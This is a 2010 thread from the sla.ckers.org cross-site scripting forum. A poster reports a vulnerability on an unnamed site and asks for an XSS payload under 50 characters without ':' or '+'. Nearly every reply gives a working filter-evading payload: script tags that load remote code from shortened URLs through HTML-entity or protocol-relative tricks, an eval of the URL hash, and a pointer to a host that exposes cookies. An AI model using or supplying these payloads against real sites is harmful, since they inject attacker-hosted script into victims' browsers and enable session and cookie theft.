Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
[help]xss with 50chars without using : or +
Posted by: Neo139
Date: May 18, 2010 09:34PM

I have found a vulnerability, but I only have 50 chars to use, and the biggest problem is I can't use the ":" char nor "+".
The good news is that I can use jQuery 1.2.6 because it's already loaded on that page.

I have 52 chars with:
<script>$.getScript('http://bit.ly/9884kP')</script>
but it has ":"
and 64 chars with:
<script>$.getScript(unescape("http%3A//bit.ly/9884kP"))</script>

I tried replacing http:// with // but it didn't work using FF3. I downloaded FF2 and it didn't work either.

I think I could avoid putting the </script> and write it manually with document.write in the JS. The problem is the http:
Also, finding a shorter unescape would be nice, but I have searched and can't find anything.
Any ideas?

Re: [help]xss with 50chars without using : or +
Date: May 19, 2010 04:32AM

<script src='http&#58;//bit.ly/9884kP'></script>

48 chars

----------------34----------------
_=/.+?('['_='+_(_)]+).+/,'_='+_(_)

Re: [help]xss with 50chars without using : or +
Posted by: Anonymous User
Date: May 19, 2010 05:29AM

<script src=http&#58//u.nu/94m7a></script>

42 - why use bit.ly if there's u.nu ;)

Regarding unescape: 'http\72//' might help



Edited 2 time(s). Last edit at 05/19/2010 05:38AM by .mario.

Re: [help]xss with 50chars without using : or +
Posted by: LeverOne
Date: May 19, 2010 08:50AM

The trick with "//" is called "same protocol". Therefore, it should not work from "file:". It works in all browsers, including FF:

<script src=//u.nu/94m7a>

----------------------
~Veritas~



Edited 1 time(s). Last edit at 05/19/2010 08:58AM by LeverOne.

Re: [help]xss with 50chars without using : or +
Posted by: thornmaker
Date: May 21, 2010 05:52PM

<script>eval(location.hash.slice(1))</script>
and append
#alert('real payload goes after the hash symbol')
to the URL. Why use a third-party site when you can have all-in-one :)

[edit:] you can use just
http://0x.lv
for a third party script which will alert your cookies or, if you have a hash, it will execute whatever follows the hash in your URL



Edited 2 time(s). Last edit at 05/21/2010 06:01PM by thornmaker.
